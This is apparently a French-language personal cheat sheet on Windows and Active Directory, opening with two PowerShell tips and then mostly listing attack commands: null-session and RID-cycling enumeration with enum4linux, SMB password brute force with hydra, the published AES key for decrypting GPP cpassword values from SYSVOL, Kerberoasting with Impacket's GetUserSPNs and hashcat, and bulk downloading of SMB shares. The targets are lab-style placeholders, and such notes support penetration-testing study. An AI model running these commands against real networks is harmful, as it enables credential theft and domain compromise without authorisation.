Windows


Dans le doute reboot, Rowan Atkinson

PowerShell

# afficher en arborescence
tree /f

# lien symbolique
new-item -itemtype symboliclink -path . -name settings.json -value "C:\Users\Kamil\OneDrive\Windows Terminal\settings.json"

Enumération

Pour obtenir des informations sur un domaine :

# null session
enum4linux -a 192.168.10.1 > enum1.txt
# énumérer les utilisateurs avec un RID cycling sur un intervalle plus grand
enum4linux -U -R 500-2000 192.168.10.1 | grep -v unknown > enum2.txt
# avec des credentials
enum4linux -u test -p test -a 192.168.10.1 > enum_as_test.txt

Mots de passe

Pour se connecter en local et pas sur le domaine : .\username

Bruteforce sur le réseau (pas du tout discret) :

hydra -L usernames.txt -P rockyou.txt 192.168.10.1 smb

Mot de passe dans SYSVOL

Pour déchiffrer le cpassword d'un compte défini dans une GPO sur un partage :

Clé AES256 donnée par Microsoft :

# AES256 cipher key
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
# Initialisation Vector
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source : https://adsecurity.org/?p=2288

Kerberoast

Avec Impacket :

python3 ./GetUserSPNs.py -request -dc-ip 192.168.10.1 MIDGAR.LAN/scarlet:password -outputfile kerberoast.hash

Pour casser ces hash :

hashcat -m 13100 -a 0 kerberoast.hash rockyou.txt -o output.txt

Partage

Pour récupérer tous les fichiers d'un partage, et les étudier en local :

smb: \> recurse
smb: \> prompt
smb: \> mget *

Liens utiles

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/

https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976